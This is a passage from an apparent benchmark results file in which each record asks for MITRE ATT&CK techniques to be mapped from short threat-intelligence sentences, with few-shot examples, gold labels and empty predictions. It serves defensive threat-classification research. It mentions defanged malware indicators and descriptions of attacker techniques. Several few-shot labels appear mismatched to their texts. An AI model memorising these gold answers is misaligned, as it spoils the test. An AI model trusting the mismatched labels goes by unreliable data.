as seen in Table 2, include checks for virtualized environments, low memory, and processor counts, in addition to checks for common analysis tools running on the system. The Trojan also checks to see if a debugger is attached to its processes and will exit if it detects the presence of a debugger\n\t - T1047: Windows Management Instrumentation\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n", + "input": "Cobalt Strike can use \"WinRM\" to execute a payload on a remote host.", + "gold": "- T1021.006: Remote Services - Windows Remote Management", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: As can be seen from the Table 2 above, Kazuar has an extensive command set, many of which are similar in functionality as other backdoor Trojans. However, a few commands specific to Kazuar appear to be unique and are worth further discussion\n\t - T1029: Scheduled Transfer\n- Text: GoldMax can check the current date-time value of the compromised system, comparing it to the hardcoded execution trigger and can send the current timestamp to the C2 server.\n\t - T1124: System Time Discovery\n- Text: Static analysis of this executable shows only two functions, but a regular number of imports. Upon detecting a debugger attached to it, the malware will display the message below and terminate the execution. This packer also hides the calls to API functions. This time instead of using a dispatcher function, the malware pushes the arguments into the stack as usual but will then perform a call to a jump table built during the unpacking, in the .text section memory region. Each entry finishes with a jmp instruction into the respective API function. Effectively the malware doesn't do any call to API functions, it always performs a jump. The end result is the same has in the packer from 2016, but with a simpler mechanism. One of the anti-analysis features included in this packer is the lack of calls to API functions. In the early stages of execution, the malware loads the libraries and retrieves the addresses from functions it needs. Feature-wise, there is no change when compared with the 2016 version, in fact when compared the C2 beaconing functions even share some of the offsets\n\t - T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion\n", + "input": "ComRAT has been programmed to sleep outside local business hours (9 to 5, Monday to Friday).", + "gold": "- T1029: Scheduled Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dok uses AppleScript to install a login Item by sending Apple events to the \"System Events\" process.\n\t - T1547.015: Boot or Logon Autostart Execution - Login Items\n- Text: persistence: Somewhat interestingly, OSX/Dok persists in two phases. First as a Login Item, then as Launch Agents. When Dok is (naively) launched by the user, it will executed logic to persist as a Login Item. As their name implies, Login Items will execute an application when the user logs in. Apple describes how to create a Login Item both manually and programmatically\n\t - T1059.002: Command and Scripting Interpreter - AppleScript\n- Text: XLoader sets up an auto start by creating a new file with a random name in the LaunchAgents folder of the current user:\n\t - T1543.001: Create or Modify System Process - Launch Agent\n", + "input": "Dok uses AppleScript to create a login item for persistence.", + "gold": "- T1059.002: Command and Scripting Interpreter - AppleScript", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Astaroth can be loaded through regsvr32.exe.\n\t - T1218.010: System Binary Proxy Execution - Regsvr32\n- Text: Just like in the sandbox checks, the Trojan checks for an attached debugger each time it issues a DNS query; if it does detect a debugger it will issue a DNS query to resolve 676f6f646c75636b.gogle[.]co\n\t - T1518.001: Software Discovery - Security Software Discovery\n\t - T1124: System Time Discovery\n\t - T1497: Virtualization/Sandbox Evasion\n- Text: Magic Hound has attempted to lure victims into opening malicious links embedded in emails.\n\t - T1204.001: User Execution - Malicious Link\n", + "input": "Squirrelwaffle has used `cmd.exe` for execution.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The following capabilities have been observed in this payload: Get drive information Modify files Modify directories Modify registry Spawn process Terminate process Modify services Kill self Ties to SunOrcal Reaver was used concurrently with SunOrcal over the past year, to include two Reaver samples dropped from zip files hosted on a domain also being used as a SunOrcal C2 (www.fyoutside[.]com), and there is also passive DNS overlap amongst the C2s\n\t - T1112: Modify Registry\n- Text: Winnti for Windows sets its DLL file as a new service in the Registry to establish persistence.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: Sykipot has been known to establish persistence by adding programs to the Run Registry key.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n", + "input": "A Threat Group-3390 tool has created new Registry keys under `HKEY_CURRENT_USER\\Software\\Classes\\` and `HKLM\\SYSTEM\\CurrentControlSet\\services`.", + "gold": "- T1112: Modify Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ADVSTORESHELL can delete files and directories.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: SUNSPOT created a copy of the SolarWinds Orion software source file with a \".bk\" extension to backup the original content, wrote SUNBURST using the same filename but with a \".tmp\" extension, and then moved SUNBURST using \"MoveFileEx\" to the original filename with a \".cs\" extension so it could be compiled within Orion software.\n\t - T1565.001: Data Manipulation - Stored Data Manipulation\n- Text: clears event logs.\n\t - T1070: Indicator Removal\n", + "input": "SUNBURST had a command to delete files.", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Next, the shellcode iterates through the PEB\u2019s loader module list looking for the base address of Kernel32.dll. This is typical of shellcode, as the Kernel32.dll base address is necessary to resolve any dependency files required by the shellcode to run. With this address, the shellcode loads its dependency modules and resolves any necessary Windows Application Programming Interface (API) calls using standard shellcode API hashing. The following modules are loaded\n\t - T1106: Native API\n- Text: StreamEx uses rundll32 to call an exported function.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: Empire contains modules that can discover and exploit search order hijacking vulnerabilities.\n\t - T1574.008: Hijack Execution Flow - Path Interception by Search Order Hijacking\n", + "input": "Ramsay can use Windows API functions such as \"WriteFile\", \"CloseHandle\", and \"GetCurrentHwProfile\" during its collection and file storage operations. Ramsay can execute its embedded components via \"CreateProcessA\" and \"ShellExecute\".", + "gold": "- T1106: Native API", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Finally, the loader spawns cmd.exe to perform a series of reconnaissance commands to obtain information about the network and domain\n\t - T1482: Domain Trust Discovery\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: SILENTTRINITY can use the `GetRegValue` function to check Registry keys within `HKCU\\Software\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated` and `HKLM\\Software\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated`. It also contains additional modules that can check software AutoRun values and use the Win32 namespace to get values from HKCU, HKLM, HKCR, and HKCC hives.\n\t - T1012: Query Registry\n- Text: Evilnum has used a component called TerraLoader to check certain hardware and file information to detect sandboxed environments.\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n", + "input": "QakBot can execute WMI queries to gather information.", + "gold": "- T1047: Windows Management Instrumentation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Backdoor.Oldrea can use a network scanning module to identify ICS-related ports.\n\t - T1046: Network Service Discovery\n- Text: In order to discover potential targets and locate the information it needs to authenticate against, the script passively collects data from /.ssh/config, .bash_history, /.ssh/known_hosts, and the likes. We did not identify any active scanning techniques used to identify additional targets\n\t - T1018: Remote System Discovery\n- Text: Lucifer can identify the IP and port numbers for all remote connections from the compromised host.\n\t - T1049: System Network Connections Discovery\n", + "input": "Chimera has used the \"get -b -e -p\" command for network scanning as well as a custom Python tool packed into a Windows executable named Get.exe to scan IP ranges for HTTP.", + "gold": "- T1046: Network Service Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Overwrite a file with all zeros and mark it for deletion on reboot Wiping files with zeros and marking it for deletion on reboot. Delete files using the DeleteFile() API Load an arbitrary library into its process space\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: EKANS removes backups of Volume Shadow Copies to disable any restoration capabilities.\n\t - T1490: Inhibit System Recovery\n- Text: AT&T Alien Labs\u2122 has discovered a new campaign by threat group TeamTNT that is targeting multiple operating systems and applications. The campaign uses multiple shell/batch scripts, new open source tools, a cryptocurrency miner, the TeamTNT IRC bot, and more\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", + "input": "Honeybee removes batch files to reduce fingerprint on the system as well as deletes the CAB file that gets encoded upon infection.", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This PowerShell backdoor was observed to be related to the SystemBC malware as a service. The script has a hard coded C&C server IP address and port number to connect to, with data passed to the \u201cRc4_crypt\u201d function before connection.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: The payload is an application that creates a hidden window (the name of the class and the window is SK_Parasite\n\t - T1564.003: Hide Artifacts - Hidden Window\n- Text: Lateral movement was done through Cobalt Strike. This tool was also used to distribute BAT files that will be used later for various purposes, including impairing the system\u2019s defenses.\n\t - T1588.002: Obtain Capabilities - Tool\n\t - T1562: Impair Defenses\n\t - T1570: Lateral Tool Transfer\n", + "input": "CopyKittens has used PowerShell Empire.", + "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Taidoor can search for specific files.\n\t - T1083: File and Directory Discovery\n- Text: Netwalker can detect and terminate active security software-related processes on infected systems.\n\t - T1518.001: Software Discovery - Security Software Discovery\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n- Text: Clambling can collect information from a compromised host.\n\t - T1005: Data from Local System\n", + "input": "Lokibot can search for specific files on an infected host.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lazarus Group has acquired servers to host their malicious tools.\n\t - T1583.004: Acquire Infrastructure - Server\n- Text: Threat Group-3390 has hosted malicious payloads on Dropbox.\n\t - T1608.001: Stage Capabilities - Upload Malware\n- Text: Gelsemium has used dynamic DNS in its C2 infrastructure.\n\t - T1568: Dynamic Resolution\n", + "input": "During Night Dragon, threat actors purchased hosted services to use for C2.", + "gold": "- T1583.004: Acquire Infrastructure - Server", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Taidoor can use \"GetLocalTime\" and \"GetSystemTime\" to collect system time.\n\t - T1124: System Time Discovery\n- Text: Stealth Falcon malware gathers the registered user and primary owner name via WMI.\n\t - T1033: System Owner/User Discovery\n- Text: Several Lazarus Group has conducted word searches on compromised machines to identify specific documents of interest. Lazarus Group malware can use a common function to identify target files by their extension, and some also enumerate files and directories, including a Destover-like variant that lists files and gathers information for all drives.\n\t - T1083: File and Directory Discovery\n", + "input": "UPPERCUT has the capability to gather the victim's current directory.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The QakBot dropper can delay dropping the payload to evade detection.\n\t - T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion\n- Text: Agent Tesla has he ability to perform anti-sandboxing and anti-virtualization checks.\n\t - T1497: Virtualization/Sandbox Evasion\n- Text: InvisiMole can check for artifacts of VirtualBox, Virtual PC and VMware environment, and terminate itself if they are detected.\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n", + "input": "Ursnif has used a 30 minute delay after execution to evade sandbox monitoring tools.", + "gold": "- T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Winnti Linux variant\u2019s core functionality is within \u2018libxselinux\u2019. Upon execution, an embedded configuration is decoded from the data section using a simple XOR cipher. An example Python function to decode this configuration is shown below\n\t - T1027: Obfuscated Files or Information\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: The C&C domain android[.]viral91[.]xyz, where the malware was connecting to also shows that it is very likely that the APT team uses subdomains to host or connect to Android malware. In previous years, some CrimsonRAT samples were also found to be hosted on the viral91[.]xyz domain.\n\t - T1584.001: Compromise Infrastructure - Domains\n\t - T1583.001: Acquire Infrastructure - Domains\n\t - T1587.001: Develop Capabilities - Malware\n\t - T1588.001: Obtain Capabilities - Malware\n- Text: InvisiMole can create hidden system directories.\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n", + "input": "Transparent Tribe has dropped encoded executables on compromised hosts.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The actors split some archived exfiltration files into chunks smaller than 1MB.\n\t - T1030: Data Transfer Size Limits\n- Text: Cobalt Strike can set its Beacon payload to reach out to the C2 server on an arbitrary and random interval.\n\t - T1029: Scheduled Transfer\n- Text: iKitten saves itself with a leading \".\" so that it's hidden from users by default.\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n", + "input": "Cobalt Strike can set its \"beacon\" payload to reach out to the C2 server on an arbitrary and random interval. In addition it will break large data sets into smaller chunks for exfiltration.", + "gold": "- T1029: Scheduled Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: After running within the %TEMP% path, Comnie will delete the original file\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: Rocke used shell scripts to run commands which would obtain persistence and execute the cryptocurrency mining malware.\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n- Text: has a command to download a file from the C2 server to the victim mobile device's SD card.\n\t - T1105: Ingress Tool Transfer\n", + "input": "WindTail has the ability to receive and execute a self-delete command.", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SILENTTRINITY can remove artifacts from the compromised host, including created Registry keys.\n\t - T1070: Indicator Removal\n- Text: Stuxnet used xp_cmdshell to store and execute SQL code.\n\t - T1505.001: Server Software Component - SQL Stored Procedures\n- Text: The decoy file, doc.rtf, contains an OLE object that uses Equation Editor to drop the embedded shellcode in %TEMP%\n\t - T1559.002: Inter-Process Communication - Dynamic Data Exchange\n", + "input": "Stuxnet can delete OLE Automation and SQL stored procedures used to store malicious payloads.", + "gold": "- T1070: Indicator Removal", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cardinal RAT is deployed using an interesting technique of compiling and executing a downloader via a malicious macro embedded within a Microsoft Excel file. The Excel files themselves contain lures that have financial themes. This threat has had a low volume of samples in the past two years, with 11 instances of Carp Downloader and 27 instances of Cardinal RAT observed\n\t - T1204.002: User Execution - Malicious File\n- Text: The button would then lead to the download a RAR archive named Adobe_Flash_Install.rar. This archive was designed to fool the targeted user into infected themselves with a Cobalt Strike implant. Details on the contents of this file are included later in this report\n\t - T1204.001: User Execution - Malicious Link\n- Text: For C0015, security researchers assessed the threat actors likely used a phishing campaign to distribute a weaponized attachment to victims.\n\t - T1566.001: Phishing - Spearphishing Attachment\n", + "input": "Confucius has lured victims to execute malicious attachments included in crafted spearphishing emails related to current topics.", + "gold": "- T1204.002: User Execution - Malicious File", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PUNCHBUGGY can gather system information such as computer names.\n\t - T1082: System Information Discovery\n- Text: SDBbot has the ability to get directory listings or drive information on a compromised host.\n\t - T1083: File and Directory Discovery\n- Text: Stage 1: A Master Boot Record (MBR) locker used to overwrite the operating system's MBR, which effectively prevents the operating system from loading successfully - Stage 2: A disk-wiper used to wipe and destroy files on the target machine\n\t - T1561.002: Disk Wipe - Disk Structure Wipe\n", + "input": "Octopus can collect system drive information, the computer name, the size of the disk, OS version, and OS architecture information.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The Ryuk group went from an email to domain wide ransomware in 29 hours and asked for over $6 million to unlock our systems. They used tools such as Cobalt Strike, AdFind, WMI, vsftpd, PowerShell, PowerView, and Rubeus to accomplish their objective.\n\t - T1588.002: Obtain Capabilities - Tool\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: APT32 has deployed tools after moving laterally using administrative accounts.\n\t - T1570: Lateral Tool Transfer\n- Text: SodaMaster has the ability to download additional payloads from C2 to the targeted system.\n\t - T1105: Ingress Tool Transfer\n", + "input": "Turla has used shellcode to download Meterpreter after compromising a victim.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ZxShell has used FTP for C2 connections.\n\t - T1071.002: Application Layer Protocol - File Transfer Protocols\n- Text: Kessel can split the data to be exilftrated into chunks that will fit in subdomains of DNS queries.\n\t - T1030: Data Transfer Size Limits\n- Text: NanHaiShu uses DNS for the C2 communications.\n\t - T1071.004: Application Layer Protocol - DNS\n", + "input": "Mythic supports HTTP-based C2 profiles.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The second version does not carry the payload directly but instead downloads it from a C2 into the same location as before. The C2 server address is embedded in the main executable in the TinkaOTP bundle. The hardcoded download and execution code are easily visible as they are unencrypted, plain UTF strings in the binary\n\t - T1105: Ingress Tool Transfer\n- Text: BLINDINGCAN has used AES and XOR to decrypt its DLLs.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: The Cloud Atlas implants utilize a rather unusual C&C mechanism. All the malware samples we\u2019ve seen communicate via HTTPS and WebDav with the same server \u201ccloudme.com\u201d, a cloud services provider. According to their website, CloudMe is owned and operated by CloudMe AB, a company based in Link\u00f6ping, Sweden\n\t - T1102: Web Service\n", + "input": "BabyShark has downloaded additional files from the C2.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ramsay can extract its agent from the body of a malicious document.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: It downloads the file to the infected machine from the input URL using BITSAdmin, and is called every time the script attempts to download a file\n\t - T1105: Ingress Tool Transfer\n- Text: When it first starts, crawls the victim's mapped drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.\n\t - T1039: Data from Network Shared Drive\n", + "input": "Rocke has extracted tar.gz files after downloading them from a C2 server.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Linux Rabbit maintains persistence on an infected machine through rc.local and .bashrc files.\n\t - T1546.004: Event Triggered Execution - Unix Shell Configuration Modification\n- Text: S-Type has provided the ability to execute shell commands on a compromised host.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: has run a plug-in on a victim to spread through the local network by using and accessing admin shares.\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n", + "input": "FIN8 executes commands remotely via cmd.exe.", + "gold": "- T1059: Command and Scripting Interpreter", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: used RDP to move laterally in victim networks.\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n- Text: During C0015, the threat actors used WMI to load Cobalt Strike onto additional hosts within a compromised network.\n\t - T1570: Lateral Tool Transfer\n- Text: GALLIUM leveraged valid accounts to maintain access to a victim network.\n\t - T1078: Valid Accounts\n", + "input": "FIN10 has used RDP to move laterally to systems in the victim environment.", + "gold": "- T1021.001: Remote Services - Remote Desktop Protocol", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK 